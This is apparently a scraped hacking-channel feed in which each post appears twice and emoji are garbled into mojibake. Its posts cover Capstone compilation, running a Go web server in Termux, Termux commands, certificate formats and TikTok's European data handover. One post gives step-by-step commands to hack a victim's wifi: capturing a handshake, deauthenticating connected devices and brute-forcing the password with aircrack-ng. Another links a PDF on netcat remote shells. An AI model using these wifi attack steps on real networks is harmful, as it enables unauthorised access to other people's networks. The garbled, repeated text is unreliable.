@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
- To compile Windows 32-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw32
- To compile Windows 64-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(7) By default, "cc" (default C compiler on the system) is used as compiler.
- To use "clang" compiler instead, run the command below:
$ ./make.sh clang
- To use "gcc" compiler instead, run:
$ ./make.sh gcc
(8) To uninstall Capstone, run the command below:
$ sudo ./make.sh uninstall
(9) Language bindings
So far, Python, Ocaml & Java are supported by bindings in the main code.
Look for the bindings under directory bindings/, and refer to README file
of corresponding languages.
Community also provide bindings for C#, Go, Ruby, NodeJS, C++ & Vala. Links to
these can be found at address http://capstone-engine.org/download.html
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
www.capstone-engine.org
Download
The Ultimate Disassembler
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Turn Android Device into a Web Server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Install & open termux
2οΈβ£$ pkg install git
3οΈβ£$ pkg install golang
4οΈβ£$ export GOPATH=/data/data/com.termux/files/home/go
5οΈβ£$ go get -u -v github.com/kataras/iris
6οΈβ£$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
7οΈβ£$ go run main.go
8οΈβ£ Open your favorite browser and navigate to http://localhost:8080
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Turn Android Device into a Web Server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Install & open termux
2οΈβ£$ pkg install git
3οΈβ£$ pkg install golang
4οΈβ£$ export GOPATH=/data/data/com.termux/files/home/go
5οΈβ£$ go get -u -v github.com/kataras/iris
6οΈβ£$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
7οΈβ£$ go run main.go
8οΈβ£ Open your favorite browser and navigate to http://localhost:8080
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - kataras/iris: The fastest HTTP/2 Go Web Framework. New, modern and easy to learn. Fast development with Code you control.β¦
The fastest HTTP/2 Go Web Framework. New, modern and easy to learn. Fast development with Code you control. Unbeatable cost-performance ratio :rocket: - kataras/iris
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Termux Useful commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Termux Useful commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :
1οΈβ£Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2οΈβ£ Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
3οΈβ£ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.
4οΈβ£Copy victimβs BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
5οΈβ£There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon
6οΈβ£Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
7οΈβ£now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
8οΈβ£ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)
π¦Tested On:
> root android
> version 6.0
Enjoy β€οΈππ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :
1οΈβ£Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2οΈβ£ Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
3οΈβ£ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.
4οΈβ£Copy victimβs BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
5οΈβ£There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon
6οΈβ£Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
7οΈβ£now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
8οΈβ£ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)
π¦Tested On:
> root android
> version 6.0
Enjoy β€οΈππ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Netcat_vs_Cryptcat_β_Remote_Shell_to_Control_Kali_Linux_from_Windows.pdf
2.2 MB
Netcat vs Cryptcat β Remote Shell to Control Kali Linux from Windows machine
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
1) Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
2) ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.
3) Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
4) ASCII (PEM) key
Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).
5) PKCS # 7 Certificate
A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
6) PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
1) Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
2) ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.
3) Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
4) ASCII (PEM) key
Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).
5) PKCS # 7 Certificate
A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
6) PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TikTok European user privacy protection work will be handed over to Ireland and UK branches on July 29 :
#News
( if you a hater for tiktok call this tracking ennemiesπΊ & and if you love tiktok call this a simple news)
> According to a news release issued by ByteDance on Monday, the responsibility for providing privacy protection for European TikTok users will be transferred to branches in Ireland and the United Kingdom. After the adjustment, the service provider of users in the EEA-Swiss region will be changed to TikTok Ireland, and the same adjustment will be made in the UK region.
>In a statement released today, TikTokβs director of trust and security in Europe, the Middle East, and Africa, Cormac Keenan, and Madeline Moncrieff, director of corporate affairs for EMEA, said the adjustment will take effect on July 29.
π¦In the statement:
> Since the introduction of TikTok to Europe, we have invested in local talent, created a regional senior leadership team, and established the necessary business functions in the region, because we believe this is the best to support our growing TikTok community here the way.
> From July 29, TikTok's Irish and British branches will succeed our US TikTok Inc, provide TikTok to European users, and manage and protect their personal data.
>TikTok has more than 1,000 employees in Europe, of which 800 employees work in the United Kingdom and Ireland. London remains the companyβs main office and its second largest office, and the Trust and Security Center in Dublin is led by Mr. Keenan. In January this year, the company said it would establish a new European base in Dublin, employing 100 employees.
>In the statement: βAs we expand throughout the region, TikTok Ireland has been responsible for maintaining the privacy and security of users in Europe. Our Trust and Security Center in Dublin allows us to focus on strengthening policies, technologies and control strategies, To ensure the safety of our community, our new data privacy team will focus on maintaining the highest standards of data protection. This work is overseen by the Office of the Data Protection Officer to promote accountability and encourage privacy awareness and a culture of compliance."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TikTok European user privacy protection work will be handed over to Ireland and UK branches on July 29 :
#News
( if you a hater for tiktok call this tracking ennemiesπΊ & and if you love tiktok call this a simple news)
> According to a news release issued by ByteDance on Monday, the responsibility for providing privacy protection for European TikTok users will be transferred to branches in Ireland and the United Kingdom. After the adjustment, the service provider of users in the EEA-Swiss region will be changed to TikTok Ireland, and the same adjustment will be made in the UK region.
>In a statement released today, TikTokβs director of trust and security in Europe, the Middle East, and Africa, Cormac Keenan, and Madeline Moncrieff, director of corporate affairs for EMEA, said the adjustment will take effect on July 29.
π¦In the statement:
> Since the introduction of TikTok to Europe, we have invested in local talent, created a regional senior leadership team, and established the necessary business functions in the region, because we believe this is the best to support our growing TikTok community here the way.
> From July 29, TikTok's Irish and British branches will succeed our US TikTok Inc, provide TikTok to European users, and manage and protect their personal data.
>TikTok has more than 1,000 employees in Europe, of which 800 employees work in the United Kingdom and Ireland. London remains the companyβs main office and its second largest office, and the Trust and Security Center in Dublin is led by Mr. Keenan. In January this year, the company said it would establish a new European base in Dublin, employing 100 employees.
>In the statement: βAs we expand throughout the region, TikTok Ireland has been responsible for maintaining the privacy and security of users in Europe. Our Trust and Security Center in Dublin allows us to focus on strengthening policies, technologies and control strategies, To ensure the safety of our community, our new data privacy team will focus on maintaining the highest standards of data protection. This work is overseen by the Office of the Data Protection Officer to promote accountability and encourage privacy awareness and a culture of compliance."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β